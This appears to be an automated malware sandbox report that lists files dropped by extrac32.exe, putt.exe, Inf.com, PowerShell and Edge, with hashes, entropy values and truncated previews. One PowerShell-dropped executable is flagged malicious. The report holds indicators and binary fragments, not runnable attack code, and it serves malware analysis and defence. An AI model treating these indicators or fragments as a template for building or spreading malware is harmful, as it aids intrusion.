                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):727
                                                                                                                                                                                                                                                                          Entropy (8bit):4.101388958324534
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:SyGSG+fCtJfjEvadTfA43k66h1ICdC3v6clC1:SyGS9PvCA433C+sCNC1
                                                                                                                                                                                                                                                                          MD5:B7AB55F71BFCD99EE591FC2293C497AA
                                                                                                                                                                                                                                                                          SHA1:2EC19D190A7933A11E70F4C14AA5EE11704C2BDB
                                                                                                                                                                                                                                                                          SHA-256:FAB67D9952658803C23ED37CB31EF8B70AE9D418641BBD9D6E48DB959D8AE51D
                                                                                                                                                                                                                                                                          SHA-512:FDEAEC906C8D6D468B370300BA745283158E70F38874163CB732C88AB972BAA08A9F233E346C701B81C8076E3452F97AA56739616D02313FD10F0C9F9C2BD60C
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:aid........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\putt.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):98304
                                                                                                                                                                                                                                                                          Entropy (8bit):7.997961977558292
                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                          SSDEEP:1536:GiBm4AFxoREyNUV7afvNWl2CSB4w51YrYILPOZfvIix/NvQLc:GidKgNE7af1kXvoyhLWRNvx
                                                                                                                                                                                                                                                                          MD5:B9D283F35F6051D1583EC106DA9F1A14
                                                                                                                                                                                                                                                                          SHA1:D3C27BE9B09E9CEFD7AC6AE4E56F1B75B7389D63
                                                                                                                                                                                                                                                                          SHA-256:6AC9078BEFA65EB3BF7487C74FE921C5B424EF9E12902B59DCB9D192ED39D342
                                                                                                                                                                                                                                                                          SHA-512:0B5B9BBA450A9C9506569E8617964B8AFE14195932F145BB95F2BF2AD24565A18CE3F0C5E40A4D3E05768906CA96B11106AFEB7D43A81DD42FBEC83DA1D9FBAB
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):3500
                                                                                                                                                                                                                                                                          Entropy (8bit):5.397224911645588
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:96:6NnC6FHCKNnC0bC2NnCO8u9C0NnCZdgECkNnChTiCLNnC4DCKNnCYwCINnCeco37:6N9NPN9N6HNwTLNv/Np+NpcSd
                                                                                                                                                                                                                                                                          MD5:514BFA307A5834A04AA889E3C0CB2A05
                                                                                                                                                                                                                                                                          SHA1:6D942CE162206BE4955DEBC525D48060824C2F9B
                                                                                                                                                                                                                                                                          SHA-256:17071C7E46FEAEC0C005B91E3624AE0359B77A6E4D2F4845757D9B7BD416D49F
                                                                                                                                                                                                                                                                          SHA-512:EAECE4A0775F2DC387F4302F5747867B10F62C5843CC5FB23A6802DB09088BE0AEDA132BA495115DD617FE39B75EBB9BD05A3FE98C7CD86B1F7576EB63F9F551
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/99EB54F49666910FCAAB36A930FFACBA",.. "id": "99EB54F49666910FCAAB36A930FFACBA",.. "title": "Microsoft Voices",.. "type": "background_page",.. "url": "chrome-extension://jdiccldimpdaibmpdkjnbmckianbfold/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/99EB54F49666910FCAAB36A930FFACBA"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/5E7FF74984316FD28E576A35FC9534F4",.. "id": "5E7FF74984316FD28E576A35FC9534F4",.. "title": "WebRTC Internals Extension",.. "type": "background_page",.. "url": "chrome-extension://ncbjelpjchkpbikbpkcchkhkblodoama/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/5E7FF74984316FD28E576A35FC9534F4"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1787
                                                                                                                                                                                                                                                                          Entropy (8bit):5.377473532179226
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:SfNaoCq/IVTECq/rfNaoCwCfwfNaoCqqCqZfNaoCw30UrU0U8Cg:6NnCqQTECq7NnCwCENnCqqCq1NnCw306
                                                                                                                                                                                                                                                                          MD5:A07AB3A574238A8A2330F38BBBCAE803
                                                                                                                                                                                                                                                                          SHA1:7FBFC0E63E7B24CBDC4B71EC872CEA8FDC6DAA25
                                                                                                                                                                                                                                                                          SHA-256:191D02698E9BEF7D51F0085BB71ED8744AA1EDA5DDF087A804C1542E8220C6A6
                                                                                                                                                                                                                                                                          SHA-512:44663CA8F9308CA9D28BC3C0A95E7C7E53FD11D6410D35FC86EB954AC087F3B2D2E36FF3FFD531C19E7038BCEDAE63901DBD215A2666338BDA7AE711F686C3C6
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/0FA26EDD1E48AE9269015DBB8244A08B",.. "id": "0FA26EDD1E48AE9269015DBB8244A08B",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/0FA26EDD1E48AE9269015DBB8244A08B"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/A2928ADAD1108BD5FEF1E80C5639BB65",.. "id": "A2928ADAD1108BD5FEF1E80C5639BB65",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/A2928ADAD1108BD5FEF1E80C5639BB65"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtoo
                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):122880
                                                                                                                                                                                                                                                                          Entropy (8bit):5.443588249528694
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:768:h4INduPbOU7aI4kCD9vmPukxhSaAwuXc/mex/SGKAGWRqA60dTcR4qYnGfAHE9AU:hBNIimuzaAwusPdKaj6iTcPAsAhxY
                                                                                                                                                                                                                                                                          MD5:B7A225A35892C158541ED50000DE3CA1
                                                                                                                                                                                                                                                                          SHA1:2ED01C2E0C53C3F61F1D8CA3AEA5CFB122F543FD
                                                                                                                                                                                                                                                                          SHA-256:5197B20A0EA030CAFD792C75D14663EBC790D55D4CA748ECC5DA58E797BDCB1E
                                                                                                                                                                                                                                                                          SHA-512:2731875211B4AE294A95DE3128451B111D801326C8BFD19E64582D25BD39724EBF672BE9A35E2CC52020B145A7964B116ED6445FFA6226C2487C1919560A09FE
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\putt.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):75776
                                                                                                                                                                                                                                                                          Entropy (8bit):7.997833338326358
                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                          SSDEEP:1536:bwDHPOTarQNZo49+qq5EkZa2m75a6K2SILq7E2Uyg3a:U7zMX9+75ETXnpSzoyg3a
                                                                                                                                                                                                                                                                          MD5:861ABB01893CEF00C917F520F2AC50C9
                                                                                                                                                                                                                                                                          SHA1:784492CD688537ECE38D75D5F9345CD75736F13E
                                                                                                                                                                                                                                                                          SHA-256:1D40C9FE3FF124342CD6638D8D536267D15DABF9B6816BE3507923912AF8658A
                                                                                                                                                                                                                                                                          SHA-512:6B112DF90D22D4C23517F1E7446172025C151F3617F730041EA49C8943572D2D93E7FBA35E4594B5139C73E1321F8B77710888D0001B203502E6CF264877008C
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):128000
                                                                                                                                                                                                                                                                          Entropy (8bit):6.342106044541643
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3072:oZg5PXPeiR6MKkjGWoUlJUPdgQa8Bp/LxyA3laW2UDQWf9:oK5vPeDkjGgQaE/loUDtf9
                                                                                                                                                                                                                                                                          MD5:AE62072FC20EC1B324E6B41DD123A00E
                                                                                                                                                                                                                                                                          SHA1:9519EED850217F390C043A7E8505CA88E43DBD8F
                                                                                                                                                                                                                                                                          SHA-256:FDA63E313CE6AE96F8A08D803D4822E8757D82DEAE07650303B2D5A54D45CEFE
                                                                                                                                                                                                                                                                          SHA-512:E3471F6D3EDDEB13B989EE72EA2A4A8A33D7B0DA1B1F99DEE25C8132B08FD4BE70063A0335E1D300E9FE252C87DA9CE816900C8468C559D0CBF1E1F466D643D7
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):88064
                                                                                                                                                                                                                                                                          Entropy (8bit):6.671440792234813
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:1536:mGc/xv5mjKu2IwNnPEBiqXv+G/UXT6TvY464qvI932eOypvcLSDOSpZ+6:K5mjccBiqXvpgF4qv+32eOyKODOSpQ6
                                                                                                                                                                                                                                                                          MD5:4ED5DCEF027C1FAAD9B155A863F099E7
                                                                                                                                                                                                                                                                          SHA1:F86263BC8EB00B518DAC5E0DE6BB8A12753CE1D6
                                                                                                                                                                                                                                                                          SHA-256:B7EBD5730B85DB548DBD9086B20400350E9469B9ED64D0C7F792898DD10E9A45
                                                                                                                                                                                                                                                                          SHA-512:100BE28B2E696A1BA6543EE005606C782AE2E35BB0E63C56E43CB5FE03B874078A1554C7EBE40121DB5ABFED2FC90E9DDDA3F5B390BF429247268BE902047D2E
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):53248
                                                                                                                                                                                                                                                                          Entropy (8bit):4.0293746515034385
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:384:aMOULtVJBCQs1xaJ3WMygaruSIKlcQljLWWel319stEjFtr+/hdvE6HDyOpbM13i:JLtVSQsbZgar3R/OWel3EYr8qcDP8W1
                                                                                                                                                                                                                                                                          MD5:652AB88B812362A12F43E5F561E9ADB4
                                                                                                                                                                                                                                                                          SHA1:7C1DD2A4C15F9CC17C4DFFD1BA62D58A58A98FDD
                                                                                                                                                                                                                                                                          SHA-256:FF8C2A1CBAA6FDAC41F8D430E5AA9209B7F3514BFEB81F8D612E6AFD7ACD93F5
                                                                                                                                                                                                                                                                          SHA-512:DF3B0DFE676802FA9C8DDF5FDBE82B704541554D59F594C6333912CD17C4CE48945F5A07310D30429516CD594E44D7E3E20204E48FCA1D2D6D4B06E434B7814D
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:rQueryValueW..VERSION.dll...timeGetTime.2.mciSendStringW....waveOutSetVolume..WINMM.dll.{.InitCommonControlsEx..S.ImageList_Create..o.ImageList_ReplaceIcon.T.ImageList_Destroy.m.ImageList_Remove..r.ImageList_SetDragCursorImage..P.ImageList_BeginDrag.V.ImageList_DragEnter.W.ImageList_DragLeave.^.ImageList_EndDrag.X.ImageList_DragMove..COMCTL32.dll....WNetAddConnection2W.I.WNetUseConnectionW....WNetCancelConnection2W..$.WNetGetConnectionW..MPR.dll.k.InternetCloseHandle...InternetOpenW...InternetSetOptionW..t.InternetCrackUrlW.Z.HttpQueryInfoW....InternetQueryOptionW..r.InternetConnectW..X.HttpOpenRequestW..^.HttpSendRequestW..5.FtpOpenFileW..2.FtpGetFileSize....InternetOpenUrlW....InternetReadFile....InternetQueryDataAvailable..WININET.dll...GetProcessMemoryInfo..PSAPI.DLL...IcmpCreateFile....IcmpSendEcho....IcmpCloseHandle.IPHLPAPI.DLL..!.LoadUserProfileW....CreateEnvironmentBlock..,.UnloadUserProfile...DestroyEnvironmentBlock.USERENV.dll.?.IsThemeActive.UxTheme.dll...InterlockedIncreme
                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):70020
                                                                                                                                                                                                                                                                          Entropy (8bit):7.039348092119214
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:1536:su0uZo2+9BGmdATGODv7xvTphAiPChgZ2kOE6:s4ZNoGmROL7F1G7ho2kOb
                                                                                                                                                                                                                                                                          MD5:4247BC278D872C15C7E77F75E2EC414D
                                                                                                                                                                                                                                                                          SHA1:3B3687C0CD3E511C262CB9E85034FE3BBB89E5A2
                                                                                                                                                                                                                                                                          SHA-256:973B0AE1E810E5E17A3A96B3B440F6D3CC588E0FB68819D8F249F7C0E81CBCBE
                                                                                                                                                                                                                                                                          SHA-512:349F6CBDC8F3B0FF07D3D1930B6FB96D6F2D88E073DD70491F5380CECEC05080A81E3B77F8004692F04D50A975666E31086BEA8E226FB46A6368E3B16D516DC2
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):88064
                                                                                                                                                                                                                                                                          Entropy (8bit):6.716538385178715
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:1536:CUQlHS3cctlxWboHdMJ3RraSXL21rKoUn9r5C03Eq30BcrTrhCX4aVmoT:CxlHS3NxrHSBRtNPnj0nEoXnmK
                                                                                                                                                                                                                                                                          MD5:0B4EA7C4E70CFAC855BF4D7C0288E2BE
                                                                                                                                                                                                                                                                          SHA1:36430F5AD2C7964DFBD3B78921FE71FD89AAF575
                                                                                                                                                                                                                                                                          SHA-256:047C2EF53D55A7E575D02A23FDE3E8DA6C6D51A2504231BD4AD33B3E0824A3EE
                                                                                                                                                                                                                                                                          SHA-512:C04298BE87BF00CB3CADA0F302E80C8C8B5A0E9F1C0017B7B80B70040392136F209CC391B728F1905F36CB8406019C5370E7FC3043158523EFF0D9DC4CA5C071
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\putt.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):97040
                                                                                                                                                                                                                                                                          Entropy (8bit):7.998385944090606
                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                          SSDEEP:1536:HgHymtPnJHvGNKNEahCqR+aCC9/uJX0Ze6Us+NeaeUxwSJqy2CRrRW/VVnS3YPDv:cycPhvGNWhTK4mXxNwHJ8qCeFAc86pSQ
                                                                                                                                                                                                                                                                          MD5:530245F3720C5A7DDD0567A546420A30
                                                                                                                                                                                                                                                                          SHA1:D5B8167F667D02398531C1CCE326509CB01E86E6
                                                                                                                                                                                                                                                                          SHA-256:B8D55ACFB72DB731DD7D1FC4FFD68B1E047E3C4CB07109BEC40B72EC4B6903DB
                                                                                                                                                                                                                                                                          SHA-512:B06FA89ABCD6913E253D7F86DC312089F7077C9F2E638DFFD27AE3849C897AE46DC3D3BA659AAF88D8A369C395D27BEA03B67B98442E9C4C925F502552606BB9
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):126976
                                                                                                                                                                                                                                                                          Entropy (8bit):6.583824448269045
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3072:i+AqVnBypIbv18mLthfhnueoMmOqDoioO5bLezW9FfTut/Dde6u640ewy4Za9coF:imVnjphfhnvO5bLezWWt/Dd314V14Zgt
                                                                                                                                                                                                                                                                          MD5:B655E394756A3AFA8CEC8800C5D1FB8B
                                                                                                                                                                                                                                                                          SHA1:F058CB3583B851FB272B9B0768FCEE865F78E486
                                                                                                                                                                                                                                                                          SHA-256:638B1FA5EFB53EFA1EB2160A5DD443D8F12614F29EBF9C1B04C7B2E59BE23A63
                                                                                                                                                                                                                                                                          SHA-512:03B9A541DBE3010C62867949D5B42625662E2EB215CCAA369533F3F7F128B4E2E368F47F1B5DB4ED3FCFAF213147BFBFAD3512D84242DCC169DB5620058933CF
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):129024
                                                                                                                                                                                                                                                                          Entropy (8bit):6.685566394532451
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3072:pAU4CE0Imbi80PtCZEMnVIPPBxT/sZydTmS:pAhClbfSCOMVIPPL/sZg
                                                                                                                                                                                                                                                                          MD5:1FA2AC3ECE7FD9A15C18981315729898
                                                                                                                                                                                                                                                                          SHA1:1477784CCA6FED096A2928C9DDDC38AB001905D1
                                                                                                                                                                                                                                                                          SHA-256:2EC359B827914240FD5094E64A16B4AC392C193BF1DA4D19395ED72779F91685
                                                                                                                                                                                                                                                                          SHA-512:2152DCB3F7004F1F78446D7AE0A65C6928C56E29DC474F80575FA7CCA450C546F3366539D97276B98FBBD0E4E6B04EB37FF1C167F32B797D78106C99B38EAAF1
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):64
                                                                                                                                                                                                                                                                          Entropy (8bit):0.34726597513537405
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:Nlll:Nll
                                                                                                                                                                                                                                                                          MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                                                                                                          SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                                                                                                          SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                                                                                                                          SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):154477
                                                                                                                                                                                                                                                                          Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                                                                          MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                                                                          SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                                                                          SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                                          SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                                          Malicious:false
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):1658
Entropy (8bit):5.409068946343501
Encrypted:false
SSDEEP:48:Y4MfJVe5wMd5wMe07cIF5Io0MY5kU2A0OpJ5xnL0MotJ5VovUx0+gF5J65JJ0+uW:JIVuwEw5MUFZLBQLtoVM
MD5:279B55533EB1964024DBF78BA833BE4D
SHA1:CAFD78B906A84A3A972B246E0D5F0D73FCAE84A9
SHA-256:0C1976F70A7D74531E573E773BD586E1C873A667FB6D83AFE68F1BCE94CE6011
SHA-512:EC0D29FA6F8A0936C97338115462CD31A187A821A7DAEA9651A6D1F9BC6D2580099DB434B1CA7B45BC65F5C484708BD6CB3C0E517BABBF18A14424B0CCD5B7C8
Malicious:false
Preview:{"logTime": "1005/061810", "correlationVector":"0kV+/vRB8ay0a3Cue7mk6o","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/061810", "correlationVector":"AFo3IfjRT+3l4ojiXpMdNH","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/061810", "correlationVector":"838E3BF9A44F456CB4AD62AC737EDD15","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/063233", "correlationVector":"2N8fwTcZh6EtTfQ8o4+6aX","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/063233", "correlationVector":"5ADEBA42608E4CC9A1FACA719F284CF9","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/063346", "correlationVector":"xp/hBMCdVPtUIxZHIviv/x","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/063347", "correlationVector":"BF0B9E58C0CC45ED9AB5D0371131E69A","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/064305", "correlationVector":"ONVjsWDap1LyjIRdxsqPGs","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/064305", "correlationVector":"82E52491
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:very short file (no magic)
Category:dropped
Size (bytes):1
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3:L:L
MD5:5058F1AF8388633F609CADB75A75DC9D
SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:false
Preview:.
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1366x720, components 3
Category:dropped
Size (bytes):31335
Entropy (8bit):7.694019108205432
Encrypted:false
SSDEEP:768:514ugFV0910SWyR5kNVdS3sNp/xm3MbiMuYEDlyFUyv6E/ty8:5WcDWyRKNVd2M/IxMuYEDlymsTQ8
                                                                                                                                                                                                                                                                          MD5:6B72597205C77D3E40E1A35BEE403801
                                                                                                                                                                                                                                                                          SHA1:6BECEE055C6E057AF9475B6D651B4EE561D02F20
                                                                                                                                                                                                                                                                          SHA-256:C899297FBDFC88C1634B1145A087FDB5BE17172FD786C078B299557B22F06DEB
                                                                                                                                                                                                                                                                          SHA-512:7CB1A98E0C7FBB349D9CB681233A9F4ED22A1C3FAADCDF1BC270B04BD97D3FC41AB6F762B2F5F231281D63D96AC3D243640BA81D5E8CCD9F54486B4F538CA8B4
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1273852
                                                                                                                                                                                                                                                                          Entropy (8bit):7.963622315465213
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24576:iSw7GQaYEXaOrP0awJKdb0QmZoEOWlx7uloMwppPETOJ4gD5zWs00:87/cXdsjJ4b0QAjOS7SoMwptK64gDgd0
                                                                                                                                                                                                                                                                          MD5:5782BEA403267E4A6DDF82263332ED59
                                                                                                                                                                                                                                                                          SHA1:2C1967ED35F79CE390EE56F30FDFA6D97426C4C9
                                                                                                                                                                                                                                                                          SHA-256:0F9003739FC0213FF837F03F9C1CE4C835E3AAB255C94D388AEFB9D9B985CB2D
                                                                                                                                                                                                                                                                          SHA-512:C52F301175E70162EF230F9BEF37C587C1168B8A79048583F65B52A5B35075DFA6569C5C6A0729A2B489D4D92E62B11BB0B0BD3C9DBCE22C00CB1327F06AE5E6
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                                                                                                                                          • Filename: script.ps1, Detection: malicious, Browse
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):154477
                                                                                                                                                                                                                                                                          Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                                                                          MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                                                                          SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                                                                          SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                                          SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1976
                                                                                                                                                                                                                                                                          Entropy (8bit):4.000452074411758
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:Y+T1ZUq9UOCtCsd2Eb0bT1pCXoqZLS8UTR:X1d9UOCtR2Eb0vTKxLs
